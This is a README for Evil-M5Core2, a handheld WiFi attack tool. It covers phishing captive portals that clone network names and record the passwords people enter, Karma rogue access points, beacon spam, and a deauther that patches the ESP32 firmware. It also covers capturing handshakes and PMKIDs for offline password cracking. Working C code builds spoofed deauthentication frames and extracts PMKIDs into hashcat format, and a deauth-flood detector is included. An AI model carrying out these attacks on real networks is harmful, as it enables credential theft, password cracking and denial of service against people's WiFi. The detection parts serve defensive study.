https://github.com/7h30th3r0n3/Evil-M5Core2
Introduction
Evil-M5Core2 is an innovative tool developed for ethical testing and exploration of WiFi networks. It harnesses the power of the M5Core2 device to scan, monitor, and interact with WiFi networks in a controlled environment. This project is designed for educational purposes, aiding in understanding network security and vulnerabilities.
Disclaimer
The creator of Evil-M5Core2 is not responsible for any misuse of this tool. It is intended solely for ethical and educational purposes. Users are reminded to comply with all applicable laws and regulations in their jurisdiction. All files provided with Evil-M5Core2 are designed to be used in a controlled environment and must be used in compliance with all applicable laws and regulations. Misuse or illegal use of this tool is strictly prohibited and not supported by the creator.
Installation
- Connect your M5Core2 to your computer.
- Open the Arduino IDE and load the provided code.
- Ensure the M5Unified, TinyGPSPlus, ArduinoJson and Adafruit_NeoPixel libraries are installed.
- Ensure the esp32 and M5Stack board packages are installed (errors occur with esp32 3.0.0-alpha3; use esp32 v2.0.14 or below).
- Copy the content of the SD folder to the SD card (needed for the startup image and the sites folder).
- Run the script in utilities to patch the esp32 firmware's restriction on sending raw frames (the board folder used in the script, M5Stack or esp32, must exist; change it if needed).
- Ensure the baud rate is set to 115200.
- Ensure PSRAM is disabled in the Tools menu.
- Upload the sketch to your M5Core2.
- Restart the device if needed.
Warning: for the Cardputer you need to change the Flash size to 8MB and the Partition Scheme to 8M with spiffs (3MB APP/1.5MB SPIFFS), or a space error may occur.
Features and explanation
Scan WiFi
- A fast scan is performed automatically at startup to identify nearby WiFi networks. Use this entry to scan again.
Select Network
- Select a network from the list. Use the left and right keys to navigate and select the desired network. After selecting a network you can clone it.
Clone & Details
- View detailed information about the selected network: SSID, channel, security used, signal strength and MAC address. You can also clone the SSID from this menu before starting the portal.
Start Captive Portal
- Deploy a web captive portal using the HTML files stored in the « sites » folder on the SD card. The deployed portal takes the name of the previously selected network's SSID. The portal should pop up automatically on some devices, or trigger a sign-in notification for the current network; whatever information is entered on the pages is written to the credentials.txt file.
Special Pages
When the captive portal is ON, you can access the following pages, protected by a password that is hardcoded in the code. Change it before compiling to protect the data stored on the SD card:
- /evil-m5core2-menu: Provides access to the other pages after authentication; enter the password to reach them (default: 7h30th3r0n3).
- /credentials: Lists captured credentials.
- /uploadhtmlfile: Upload files to the SD card; select the folder and send the file (keep uploads under 3 MB).
- /check-sd-file: Index to check, download, and delete files on the SD card.
- /Change-Portal-Password: Change the password of the deployed access point.
Stop Captive Portal
- Stop the captive portal and DNS.
Change Portal
- Choose the portal page served to connecting users. Lists only the HTML files in the sites folder at the root of the SD card.
Check Credentials
- View captured credentials: username, password, portal used and the SSID under which they were captured.
Delete Credentials
- Delete all previous captured credentials.
Monitor Status
- Consists of three static menus navigable using the left and right buttons.
Menu 1: System Overview
- Number of Connected Clients: Displays the number of currently connected clients.
- Credentials Count: Shows the number of passwords stored in credentials.txt.
- Current Selected Portal: Indicates the currently cloned portal.
- Portal Status: Displays whether the portal is ON or OFF.
- Provided Portal Page: Details about the current portal page.
- Bluetooth: Displays whether Bluetooth is ON or OFF.
Menu 2: Client Information
- MAC Addresses: Lists the MAC addresses of all connected clients.
Menu 3: Device Status
- Stack left: Displays the remaining stack in the device.
- Available RAM: Displays the remaining RAM in the device.
- Battery Level: Shows the current battery level.
- Temperature: Reports the device’s internal temperature.
Probe Request Process
When a WiFi-enabled device (such as a smartphone, laptop, or tablet) moves out of range of a known WiFi network and then comes back into range, it needs to reconnect to that network. To do this efficiently, the device uses a process involving « probe requests ».
- Probe Request Emission:
- The device actively scans for available WiFi networks by broadcasting probe request frames.
- These probe requests are essentially « pings » sent out by the device to check if the previously known networks are available nearby.
- Each probe request contains information about the network(s) the device is looking for, typically including the SSID (Service Set Identifier) of the network. Many current devices instead send only wildcard probes with an empty SSID and randomize their MAC address while scanning, which limits what probe sniffing reveals about them.
- Access Point Response:
- Nearby WiFi access points (APs) that match the SSID specified in the probe request will respond with a probe response frame.
- This response includes details such as the network capabilities, supported data rates, and other relevant information.
- Reconnection:
- Upon receiving a probe response, the device can then proceed to authenticate and associate with the access point, completing the reconnection process.
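As an added example (not code from the Evil-M5Core2 project, whose sketches are Arduino C++; this is plain C that compiles in either), the following parses raw 802.11 probe request frames the way a probe sniffer must: it checks the frame type and subtype, reads the transmitter address, walks the tagged information elements to find the SSID element, rejects truncated elements instead of reading past the buffer, and deduplicates the SSIDs into a store capped at 200 entries like the probes.txt store described further down. The frames are constructed samples, not captures; on an ESP32 the bytes would arrive through the esp_wifi_set_promiscuous_rx_cb callback, which is not used here so the program runs offline.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MGMT_HDR_LEN 24
#define MAX_SSID_LEN 32
#define MAX_PROBES   200          /* same cap as the probes.txt store */

/* Pull the requested SSID out of a raw 802.11 probe request.
 * Returns 1 and fills ssid/sta on success; an empty ssid means a wildcard
 * (broadcast) probe that names no network. Returns 0 for any other frame
 * type and for a truncated or malformed information element. */
int probe_request_ssid(const uint8_t *f, size_t len, char ssid[MAX_SSID_LEN + 1], uint8_t sta[6])
{
    if (len < MGMT_HDR_LEN) return 0;
    if (((f[0] >> 2) & 0x03) != 0 || ((f[0] >> 4) & 0x0f) != 4) return 0;  /* type 0 (mgmt), subtype 4 */
    memcpy(sta, f + 10, 6);                        /* addr2: the probing station */
    size_t pos = MGMT_HDR_LEN;                     /* tagged parameters start right after the header */
    while (pos + 2 <= len) {
        uint8_t tag = f[pos], tlen = f[pos + 1];
        if (pos + 2 + tlen > len) return 0;        /* element claims more bytes than the frame has */
        if (tag == 0) {                            /* element ID 0 = SSID */
            if (tlen > MAX_SSID_LEN) return 0;
            memcpy(ssid, f + pos + 2, tlen);
            ssid[tlen] = '\0';
            return 1;
        }
        pos += 2 + tlen;
    }
    return 0;                                      /* no SSID element at all */
}

typedef struct {
    char ssid[MAX_PROBES][MAX_SSID_LEN + 1];
    int count;
} probe_store_t;

void probe_store_init(probe_store_t *s) { s->count = 0; }

/* Record an SSID once. Returns 1 if newly stored; 0 for wildcard, duplicate, oversized or store full. */
int probe_store_add(probe_store_t *s, const char *ssid)
{
    if (ssid[0] == '\0' || strlen(ssid) > MAX_SSID_LEN || s->count >= MAX_PROBES) return 0;
    for (int i = 0; i < s->count; i++)
        if (strcmp(s->ssid[i], ssid) == 0) return 0;
    strcpy(s->ssid[s->count++], ssid);
    return 1;
}

/* Body of a promiscuous-mode callback: parse the frame, keep the SSID if it is new. */
int probe_sniff(probe_store_t *s, const uint8_t *f, size_t len)
{
    char ssid[MAX_SSID_LEN + 1];
    uint8_t sta[6];
    if (!probe_request_ssid(f, len, ssid, sta)) return 0;
    return probe_store_add(s, ssid);
}

/* CONSTRUCTED sample frames (not real captures). Station aa:bb:cc:dd:ee:ff probing. */
static const uint8_t probe_rickroll[] = {
    0x40,0x00, 0x00,0x00,                         /* frame control: probe request; duration */
    0xff,0xff,0xff,0xff,0xff,0xff,                /* addr1: broadcast */
    0xaa,0xbb,0xcc,0xdd,0xee,0xff,                /* addr2: probing station */
    0xff,0xff,0xff,0xff,0xff,0xff,                /* addr3: wildcard BSSID */
    0x10,0x00,                                    /* sequence control */
    0x00,0x08,'R','i','c','k','R','o','l','l',    /* SSID element */
    0x01,0x04,0x82,0x84,0x8b,0x96                 /* supported rates element */
};
static const uint8_t probe_wildcard[] = {        /* SSID element with length 0 */
    0x40,0x00, 0x00,0x00, 0xff,0xff,0xff,0xff,0xff,0xff, 0xaa,0xbb,0xcc,0xdd,0xee,0xff,
    0xff,0xff,0xff,0xff,0xff,0xff, 0x20,0x00, 0x00,0x00
};
static const uint8_t probe_truncated[] = {       /* SSID element claims 20 bytes, only 4 present */
    0x40,0x00, 0x00,0x00, 0xff,0xff,0xff,0xff,0xff,0xff, 0xaa,0xbb,0xcc,0xdd,0xee,0xff,
    0xff,0xff,0xff,0xff,0xff,0xff, 0x30,0x00, 0x00,0x14,'H','o','m','e'
};
static const uint8_t beacon_frame[24] = { 0x80,0x00 }; /* beacon header: must be ignored */

int main(void)
{
    probe_store_t s;
    probe_store_init(&s);
    probe_sniff(&s, probe_rickroll, sizeof probe_rickroll);
    probe_sniff(&s, probe_rickroll, sizeof probe_rickroll);   /* duplicate: not stored twice */
    probe_sniff(&s, probe_wildcard, sizeof probe_wildcard);   /* wildcard: nothing to store */
    probe_sniff(&s, probe_truncated, sizeof probe_truncated); /* malformed: rejected */
    probe_sniff(&s, beacon_frame, sizeof beacon_frame);       /* wrong subtype: ignored */
    for (int i = 0; i < s.count; i++) printf("probe for SSID \"%s\"\n", s.ssid[i]);
    return 0;
}
```

The bounds check on every element is the part that matters on a microcontroller: a single probe request with a lying length byte would otherwise read past the receive buffer inside the WiFi driver's callback.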
Probe Attack
- Sends fake random probe requests on all channels. Adjust the delay between frames with the left or right buttons (200 ms to 1000 ms). This can be used to confuse probe-sniffing devices such as another Evil-M5. The probes can carry a custom SSID (set in the config.txt file in the config folder; default RickRoll) or random character strings.
Probe Sniffing
- Starts a probe request capture. The SSIDs seen can be stored on the SD card at the end of the scan (limited to 200 probes). They can then be reused from the Select Probe menu and deployed with Start Portal.
Karma
Karma Attack
- Similar to Probe Sniffing, but lets you select a single SSID after the probe scan. It deploys an access point with that SSID and waits 60 seconds for a possibly vulnerable device to connect. If a client connects, the portal is served automatically.
Karma Auto
- Automates Karma attacks on captured probes: from the first probe received, it retries every 15 seconds until a client connects or the user stops it. Inspired by the Pwnagotchi project, but using probes and a rogue AP.
Karma Spear
- Similar to Karma Auto but uses the open SSIDs captured during wardriving. At the end of a wardriving session you are asked whether to save the open networks; answering yes populates KarmaList.txt with them. You can also add custom SSIDs to KarmaList.txt.
Select Probe
- Menu to select a previously captured probe SSID and deploy it with Start Portal. Limited to 200 listed probes. You can also add custom SSIDs to probes.txt.
Delete Probe
- Menu to delete a single previously captured probe SSID. Limited to 200 probes.
Delete All Probes
- Deletes all previously captured probes, resetting probes.txt on SD card.
Brightness
- Adjust the screen brightness. Stored in the config.txt file in the config folder.
Bluetooth ON/OFF
- Switch Bluetooth ON or OFF to control the device over Bluetooth serial. Only on specific M5 devices.
Wardriving
Wardriving is the practice of driving around in a vehicle with a laptop or smartphone to detect and map the location of Wi-Fi wireless networks. This activity often involves using software and hardware tools to capture data about the networks, such as their SSIDs (network names), signal strengths, and security configurations. The goal can be to find open or weakly secured networks for internet access, to gather information for security assessments, or simply for hobbyist mapping purposes.
WIGLE (Wireless Geographic Logging Engine) is a website and app that collects and displays crowdsourced information about wireless networks worldwide. Users contribute data by uploading their wardriving results, which are then aggregated into a publicly accessible database and map. This data can be used for various purposes, including research, security analysis, and network planning.
- Scans WiFi networks and, when a GPS is attached, logs them with their position in Wigle format. Without GPS it can still be used to populate KarmaList.txt with open networks.
Beacon Spam
Beacon spam, also known as SSID spam, is a technique used in wireless networking to broadcast multiple, often fake, Wi-Fi network names (SSIDs) to disrupt or manipulate the surrounding wireless environment. This practice can overwhelm users' devices by presenting numerous network options, which can be confusing and potentially lead to connection issues. Beacon spam can be used maliciously to interfere with legitimate networks and make it difficult for users to connect to their intended Wi-Fi.
- Creates multiple networks on all channels, so multiple SSIDs show up in a WiFi search. This is a workaround I found that achieves a similar effect without the firmware bypass: it is less effective than sending forged beacon frames, but it does disturb tools such as airodump-ng. It is deliberately built this way, which is not the usual approach in other projects.
Deauther
Send deauthentication frames, inspired by Spacehuhn's Deauther project.
A deauther, also known as a deauthentication tool or deauth tool, is a device or software used to send deauthentication frames to a Wi-Fi network, causing connected devices to disconnect. This can be used for various purposes, including network testing, security assessments, and malicious activities.
How Deauther Works
- Deauthentication Frames: In Wi-Fi networks, deauthentication frames are management frames that tell a device it has been disconnected from the network. These frames are part of the 802.11 standard and are meant to be used by legitimate network devices.
- Sending Deauthentication Frames: A deauther device or software sends these frames, with a spoofed source address, to one or more devices connected to a target Wi-Fi network, forcing them to disconnect. Networks using 802.11w Protected Management Frames (mandatory in WPA3) authenticate deauthentication frames and discard spoofed ones, so this does not work against them.
- Reconnection: After being disconnected, devices will typically try to reconnect automatically. This creates an opportunity for the attacker to capture handshake data or disrupt network service.
Sniffing EAPOL 4-way handshakes and PMKID (Pairwise Master Key Identifier) are techniques used in the context of Wi-Fi security, particularly for cracking WPA/WPA2 protected networks.
Sniffing EAPOL 4-Way Handshakes
When a client device connects to a Wi-Fi network, the access point and the client perform a 4-way handshake to authenticate and generate encryption keys. This handshake involves four Extensible Authentication Protocol over LAN (EAPOL) messages. By capturing these handshake packets, an attacker can attempt to crack the Wi-Fi password offline.
- Capture Handshake: Using tools like Wireshark, Aircrack-ng, or similar, an attacker captures the 4-way handshake packets.
- Cracking: The attacker then uses software to perform a dictionary or brute-force attack on the captured handshake, attempting to guess the Pre-Shared Key (PSK) used to secure the network.
Sniffing PMKID
PMKID is another method used to attack WPA/WPA2 networks. This technique involves capturing the PMKID, which is present in the first message of the 4-way handshake in some implementations.
- Capture PMKID: Tools like hcxdumptool can be used to capture PMKID from the wireless traffic.
- Cracking: The captured PMKID is then subjected to a cracking process similar to that used for 4-way handshakes, typically using Hashcat.
Cracking
Once the necessary data (EAPOL handshake or PMKID) is captured, the process of cracking involves:
- Dictionary Attack: Using a list of potential passwords (wordlist), the cracking software attempts each password to see if it matches the captured handshake or PMKID.
- Brute-Force Attack: If a dictionary attack fails, a more exhaustive brute-force attack can be used, trying all possible combinations of characters up to a certain length.
Cracking these protections depends heavily on the complexity of the password and the computational power available. Strong, complex passwords can significantly mitigate the risk of successful cracking.
A script to convert the pcap captures to hccapx for cracking with hashcat is provided in utilities. (hashcat's current WPA mode is 22000, which takes the hc22000 text format; hccapx with mode 2500 is a legacy format.)
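As an added example (not the project's conversion script, and written in plain C rather than Python), the following walks a raw EAPOL-Key message 1 from the 802.11 data header through LLC/SNAP and the 802.1X header to the key data, extracts the PMKID KDE (OUI 00-0F-AC, data type 4) when the AP includes one, and formats it as a hashcat mode 22000 line. The sample frame is constructed inside the block; the ESSID is passed in separately because in a real capture it comes from the beacon stored alongside the EAPOL frame.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

typedef struct { uint8_t ap[6], sta[6], pmkid[16]; } pmkid_t;

static uint16_t be16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* LLC/SNAP header announcing an 802.1X (EAPOL) payload, EtherType 0x888e. */
static const uint8_t LLC_SNAP_EAPOL[8] = {0xaa,0xaa,0x03,0x00,0x00,0x00,0x88,0x8e};

/* Find the PMKID in message 1 of the 4-way handshake. f is a raw 802.11 data frame.
 * Returns 1 with the AP/station MACs and PMKID filled, 0 if this is not an EAPOL-Key
 * message 1 or it carries no PMKID KDE (not every AP includes one). */
int extract_pmkid(const uint8_t *f, size_t len, pmkid_t *out)
{
    if (len < 24 || ((f[0] >> 2) & 0x03) != 2) return 0;   /* data frames only */
    if (f[1] & 0x40) return 0;                              /* protected bit set: EAPOL is sent in the clear */
    size_t hdr = 24 + ((f[0] & 0x80) ? 2 : 0);              /* QoS data subtypes add a 2-byte QoS control */
    int to_ds = f[1] & 0x01, from_ds = f[1] & 0x02;
    if (from_ds && !to_ds) { memcpy(out->ap, f + 10, 6); memcpy(out->sta, f + 4, 6); }    /* AP -> station */
    else if (to_ds && !from_ds) { memcpy(out->ap, f + 4, 6); memcpy(out->sta, f + 10, 6); } /* station -> AP */
    else return 0;                                          /* IBSS or 4-address WDS: not handled */
    if (len < hdr + 12 || memcmp(f + hdr, LLC_SNAP_EAPOL, 8) != 0) return 0;
    const uint8_t *x = f + hdr + 8;                         /* 802.1X header: version, type, length */
    if (x[1] != 0x03) return 0;                             /* type 3 = EAPOL-Key */
    size_t body = be16(x + 2);
    if (body < 95 || hdr + 12 + body > len) return 0;       /* never trust a length field past the frame end */
    const uint8_t *k = x + 4;                               /* EAPOL-Key descriptor */
    if (k[0] != 0x02 && k[0] != 0xfe) return 0;             /* RSN (2) or legacy WPA (254) descriptor */
    if ((be16(k + 1) & 0x0180) != 0x0080) return 0;         /* message 1: Ack bit set, MIC bit clear */
    size_t kdlen = be16(k + 93);                            /* key data length sits after the 16-byte MIC */
    if (95 + kdlen > body) return 0;
    const uint8_t *kd = k + 95, *end = kd + kdlen;
    while (kd + 2 <= end) {                                 /* KDEs are TLVs like information elements */
        uint8_t t = kd[0], l = kd[1];
        if (kd + 2 + l > end) return 0;
        if (t == 0xdd && l >= 20 && kd[2] == 0x00 && kd[3] == 0x0f && kd[4] == 0xac && kd[5] == 0x04) {
            memcpy(out->pmkid, kd + 6, 16);                 /* OUI 00-0F-AC, data type 4 = PMKID */
            return 1;
        }
        kd += 2 + l;
    }
    return 0;
}

static void hex(char *dst, const uint8_t *src, size_t n)
{
    static const char d[] = "0123456789abcdef";
    for (size_t i = 0; i < n; i++) { dst[2 * i] = d[src[i] >> 4]; dst[2 * i + 1] = d[src[i] & 0x0f]; }
    dst[2 * n] = '\0';
}

/* hashcat mode 22000 line for a PMKID: WPA*01*PMKID*MAC_AP*MAC_STA*ESSID(hex)***
 * The ESSID comes from the beacon/probe response saved next to the EAPOL frame. */
int pmkid_to_hc22000(const pmkid_t *p, const char *essid, char *out, size_t cap)
{
    size_t elen = strlen(essid);
    if (elen == 0 || elen > 32 || cap < 70 + 2 * elen) return 0;
    char pm[33], ap[13], sta[13], es[65];
    hex(pm, p->pmkid, 16); hex(ap, p->ap, 6); hex(sta, p->sta, 6); hex(es, (const uint8_t *)essid, elen);
    snprintf(out, cap, "WPA*01*%s*%s*%s*%s***", pm, ap, sta, es);
    return 1;
}

/* CONSTRUCTED sample, not a capture: unencrypted EAPOL-Key message 1 from AP 00:11:22:33:44:55
 * to station aa:bb:cc:dd:ee:ff carrying a PMKID KDE whose 16 bytes are 00..0f. */
size_t build_constructed_m1(uint8_t *buf, size_t cap)
{
    static const uint8_t ap[6] = {0x00,0x11,0x22,0x33,0x44,0x55}, sta[6] = {0xaa,0xbb,0xcc,0xdd,0xee,0xff};
    const size_t kdlen = 2 + 4 + 16, body = 95 + kdlen, total = 24 + 8 + 4 + body;
    if (cap < total) return 0;
    memset(buf, 0, total);
    buf[0] = 0x08; buf[1] = 0x02;                           /* data frame, FromDS */
    memcpy(buf + 4, sta, 6); memcpy(buf + 10, ap, 6); memcpy(buf + 16, ap, 6);
    memcpy(buf + 24, LLC_SNAP_EAPOL, 8);
    uint8_t *x = buf + 32;
    x[0] = 0x02; x[1] = 0x03; x[2] = (uint8_t)(body >> 8); x[3] = (uint8_t)body;   /* 802.1X v2, Key */
    uint8_t *k = x + 4;
    k[0] = 0x02; k[1] = 0x00; k[2] = 0x8a;                  /* RSN descriptor; key info: pairwise | ack, v2 */
    k[3] = 0x00; k[4] = 0x10; k[12] = 0x01;                 /* key length 16, replay counter 1 */
    for (int i = 0; i < 32; i++) k[13 + i] = (uint8_t)(0xa0 + i);   /* ANonce (made up) */
    k[93] = (uint8_t)(kdlen >> 8); k[94] = (uint8_t)kdlen;
    uint8_t *kde = k + 95;
    kde[0] = 0xdd; kde[1] = 0x14; kde[2] = 0x00; kde[3] = 0x0f; kde[4] = 0xac; kde[5] = 0x04;
    for (int i = 0; i < 16; i++) kde[6 + i] = (uint8_t)i;
    return total;
}

int main(void)
{
    uint8_t frame[160]; pmkid_t p; char line[160];
    size_t n = build_constructed_m1(frame, sizeof frame);
    if (extract_pmkid(frame, n, &p) && pmkid_to_hc22000(&p, "testnet", line, sizeof line))
        puts(line);   /* append to a .22000 file, then: hashcat -m 22000 file wordlist */
    return 0;
}
```

Two details carry over to real captures: the key-info check (Ack set, MIC clear) is what distinguishes message 1 from the other three, and the length checks are needed because a truncated or deliberately malformed EAPOL frame must not make the parser read past the PCAP record.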
On Evil-M5 :
To send deauthentication frames while sniffing EAPOL packets at the same time (or simply to send deauth):
- Select the network.
- Go to the deauther menu.
- Answer the prompted questions.
- Start deauth and sniff simultaneously.
Special thanks to Aro2142 and n0xa for their contributions.
Client Sniff And Deauth
Sniff connected clients and send deauthentication frames automatically. This feature is inspired by Evilsocket's Pwnagotchi project.
On Screen Information:
- AP: Number of access points near you.
- C: Current channel.
- H: Number of new PCAP files created (at least one EAPOL and beacon frame).
- E: Number of EAPOL packets captured.
- D: 0 = no deauth (only sniffing) / 1 = active deauth.
- DF: Fast mode.
Controls:
- Left Button: Toggle deauth ON/OFF.
- Middle Button: Return to menu.
- Right Button: Switch between fast/slow mode.
On Cardputer:
- D key: Toggle deauth ON/OFF.
- Return key: Return to menu.
- F key: Switch between fast/slow mode.
Functionality:
- Scan for nearby access points.
- Sniff if a client is connected to the access point.
- Send broadcast deauth frames to each access point with connected clients.
- Send spoofed deauth frames for each client.
- Sniff EAPOL packets simultaneously.
- Loop back to scan nearby access points.
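The frame itself, as an added example that serves both the "How Deauther Works" explanation and the Client Sniff And Deauth loop above (this is not the project's code; the addresses are constructed and the 26-byte layout follows the 802.11 management frame format): one broadcast frame sent as the AP, and the spoofed pair for a single client.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define DEAUTH_FRAME_LEN 26
/* 802.11 reason codes; 7 ("class 3 frame received from nonassociated STA") is the one most tools send. */
#define REASON_UNSPECIFIED      1
#define REASON_CLASS3_NONASSOC  7

static const uint8_t BROADCAST[6] = {0xff,0xff,0xff,0xff,0xff,0xff};

/* Serialise one deauthentication frame:
 *   FC(2) duration(2) addr1=receiver(6) addr2=transmitter(6) addr3=BSSID(6) seq(2) reason(2)
 * The transmitter address is whatever the sender claims; nothing in the frame proves it
 * unless 802.11w (Protected Management Frames) is in use. */
size_t build_deauth(uint8_t out[DEAUTH_FRAME_LEN], const uint8_t receiver[6],
                    const uint8_t transmitter[6], const uint8_t bssid[6],
                    uint16_t seq, uint16_t reason)
{
    out[0] = 0xC0;                              /* type 0 (management), subtype 12 (deauthentication) */
    out[1] = 0x00;                              /* flags */
    out[2] = 0x00; out[3] = 0x00;               /* duration */
    memcpy(out + 4,  receiver, 6);
    memcpy(out + 10, transmitter, 6);
    memcpy(out + 16, bssid, 6);
    out[22] = (uint8_t)((seq << 4) & 0xff);     /* sequence control: fragment 0, 12-bit seq, little-endian */
    out[23] = (uint8_t)((seq >> 4) & 0xff);
    out[24] = (uint8_t)(reason & 0xff);         /* reason code, little-endian */
    out[25] = (uint8_t)(reason >> 8);
    return DEAUTH_FRAME_LEN;
}

/* The broadcast frame of the sniff-and-deauth loop: sent as the AP to every station at once. */
size_t build_broadcast_deauth(uint8_t out[DEAUTH_FRAME_LEN], const uint8_t bssid[6], uint16_t seq)
{
    return build_deauth(out, BROADCAST, bssid, bssid, seq, REASON_CLASS3_NONASSOC);
}

/* The spoofed pair for one client: one frame as the AP telling the client to leave,
 * one as the client telling the AP it has left. Returns the number of frames filled (2). */
int build_client_deauth_pair(uint8_t out[2][DEAUTH_FRAME_LEN], const uint8_t bssid[6],
                             const uint8_t client[6], uint16_t seq)
{
    build_deauth(out[0], client, bssid, bssid, seq, REASON_CLASS3_NONASSOC);
    build_deauth(out[1], bssid, client, bssid, seq, REASON_CLASS3_NONASSOC);
    return 2;
}

/* Decoder used to check frames before they go out. Returns 1 if the buffer is a
 * well-formed deauthentication frame and stores its sequence number and reason code. */
int parse_deauth(const uint8_t *f, size_t len, uint16_t *seq, uint16_t *reason)
{
    if (len < DEAUTH_FRAME_LEN) return 0;
    if (((f[0] >> 2) & 0x03) != 0 || ((f[0] >> 4) & 0x0f) != 12) return 0;
    *seq = (uint16_t)((f[22] >> 4) | (f[23] << 4));
    *reason = (uint16_t)(f[24] | (f[25] << 8));
    return 1;
}

int main(void)
{
    /* CONSTRUCTED addresses, not a real network. */
    static const uint8_t bssid[6]  = {0x02,0x11,0x22,0x33,0x44,0x55};
    static const uint8_t client[6] = {0x02,0xaa,0xbb,0xcc,0xdd,0xee};
    uint8_t bcast[DEAUTH_FRAME_LEN], pair[2][DEAUTH_FRAME_LEN];
    build_broadcast_deauth(bcast, bssid, 1);
    build_client_deauth_pair(pair, bssid, client, 2);
    /* On the ESP32 each buffer would be handed to esp_wifi_80211_tx(WIFI_IF_AP, frame, len, false);
     * the stock firmware refuses raw deauthentication frames, which is what the bypass in the
     * Installation section removes. Here we only print the broadcast frame. */
    for (size_t i = 0; i < DEAUTH_FRAME_LEN; i++) printf("%02x", bcast[i]);
    printf("\n");
    return 0;
}
```

Which address goes in addr1 versus addr2 is the whole trick: the AP-to-client frame carries the BSSID as transmitter so the client's driver believes its own AP dropped it, and the client-to-AP frame does the reverse so the AP tears down the association from its side.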
Handshake/Deauth Sniffing
Evil-M5Core2 can capture EAPOL packets (4-way handshakes and PMKID), inspired by G4lile0's Wifi-Hash-Monster project.
On Screen Information:
- Channel: Current channel.
- Mode: Static (stay on the same channel) / Auto (hopping through all channels).
- PPS: Packets per second on the channel (if no activity, PPS may show the last known number due to refresh on packet receipt).
- H: Number of new PCAP files created (at least one EAPOL and beacon frame).
- EAPOL: Number of EAPOL packets captured.
- DEAUTH: Number of deauthentication packets seen.
- RSSI: Signal strength (a rough indication of distance from the transmitter).
If an EAPOL packet is detected, it is written to a PCAP file identified by the AP's MAC address, together with a beacon frame from that BSSID (cracking tools need the beacon to learn the SSID). You can then use tools like Aircrack-ng or Hashcat to recover the WiFi password from the 4-way handshake or PMKID.
A Python tool for processing multiple PCAP files into Hashcat format is provided in the utilities folder.
Detect Deauthentication Packets
Detect nearby deauthentication packets, which are normally sent when a station or access point ends a connection. They can be spoofed to disconnect devices and exploit automatic reconnection to capture the 4-way handshake. An abnormal number of deauthentication packets is a sign of a possible Wi-Fi attack.
This feature also detects nearby Pwnagotchi devices, printing their name and the number of networks pwned, which indicates you may be under attack.
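An added example of the detection side (not the project's code): a sliding-window counter over sniffed frames that raises an alert when deauthentication or disassociation frames exceed a rate. The 1-second window and the threshold of 20 frames are assumptions to tune per environment (a busy office legitimately sees a few per minute, a flood produces dozens per second); the frames are constructed samples.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define WINDOW_MS        1000
#define ALERT_THRESHOLD  20      /* assumed: more than this many deauth/disassoc per window is a flood */
#define RING             256

typedef struct {
    uint32_t times[RING];        /* arrival times (ms) of recent deauth/disassoc frames, oldest at head */
    int head, count;
    uint32_t total;              /* lifetime count, what the DEAUTH counter on screen shows */
} deauth_monitor_t;

void deauth_monitor_init(deauth_monitor_t *m) { m->head = 0; m->count = 0; m->total = 0; }

/* Management frame (type 0) with subtype 12 (deauthentication) or 10 (disassociation). */
int is_deauth_or_disassoc(const uint8_t *f, size_t len)
{
    if (len < 24) return 0;
    if (((f[0] >> 2) & 0x03) != 0) return 0;
    uint8_t subtype = (f[0] >> 4) & 0x0f;
    return subtype == 12 || subtype == 10;
}

/* Drop timestamps that fell out of the window. Unsigned subtraction survives a millis() wrap. */
static void evict_expired(deauth_monitor_t *m, uint32_t now_ms)
{
    while (m->count > 0 && now_ms - m->times[m->head] > WINDOW_MS) {
        m->head = (m->head + 1) % RING;
        m->count--;
    }
}

/* Feed one sniffed frame with its arrival time. Returns 1 when the number of
 * deauth/disassoc frames seen within WINDOW_MS exceeds ALERT_THRESHOLD. */
int deauth_monitor_feed(deauth_monitor_t *m, uint32_t now_ms, const uint8_t *f, size_t len)
{
    evict_expired(m, now_ms);
    if (!is_deauth_or_disassoc(f, len)) return 0;
    m->total++;
    if (m->count == RING) {                      /* ring full: forget the oldest */
        m->head = (m->head + 1) % RING;
        m->count--;
    }
    m->times[(m->head + m->count) % RING] = now_ms;
    m->count++;
    return m->count > ALERT_THRESHOLD;
}

/* CONSTRUCTED frames, not captures: a broadcast deauthentication from BSSID 02:11:22:33:44:55
 * with reason code 7, and a minimal beacon header that must be ignored. */
static const uint8_t sample_deauth[26] = {
    0xc0,0x00, 0x00,0x00,
    0xff,0xff,0xff,0xff,0xff,0xff,
    0x02,0x11,0x22,0x33,0x44,0x55,
    0x02,0x11,0x22,0x33,0x44,0x55,
    0x10,0x00, 0x07,0x00
};
static const uint8_t sample_beacon[24] = { 0x80,0x00 };

/* Replay n copies of the sample deauth spaced spacing_ms apart from start_ms. Returns the
 * 0-based index of the first frame that raised the alert, or -1 if the rate stayed benign. */
int simulate_flood(deauth_monitor_t *m, uint32_t start_ms, int n, uint32_t spacing_ms)
{
    for (int i = 0; i < n; i++)
        if (deauth_monitor_feed(m, start_ms + (uint32_t)i * spacing_ms, sample_deauth, sizeof sample_deauth))
            return i;
    return -1;
}

int main(void)
{
    deauth_monitor_t m;
    deauth_monitor_init(&m);
    printf("flood at 100 frames/s: alert on frame %d\n", simulate_flood(&m, 0, 25, 10));
    deauth_monitor_init(&m);
    printf("10 frames/s: alert on frame %d (-1 = none)\n", simulate_flood(&m, 0, 25, 100));
    return 0;
}
```

Counting disassociation alongside deauthentication matters because some tools send that subtype instead, and a per-BSSID or per-client breakdown of the same counter is the natural next step for telling a targeted attack from background noise.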
Check Handshakes
Lists the previously captured PCAP files.
Wall of Flipper
Flipper Zero Detection via Bluetooth
- Discover Flipper Name
- Discover Flipper MAC address (normal/spoofed)
- Discover Flipper Color (Transparent, White, Black)
- Save Discovered Devices to SD Card
Identify Potential Bluetooth Advertisement Attacks
- Suspected Advertisement Attacks
- iOS Popup Advertisement Attacks
- Samsung and Android BLE Advertisement Attacks
- Windows Swift Pair Advertisement Attacks
- LoveSpouse Advertisement Attacks (Denial of Pleasure)
Change Startup Image
- Upload a 320×240 startup.jpg image to replace the original and personalize your Evil-M5Core2.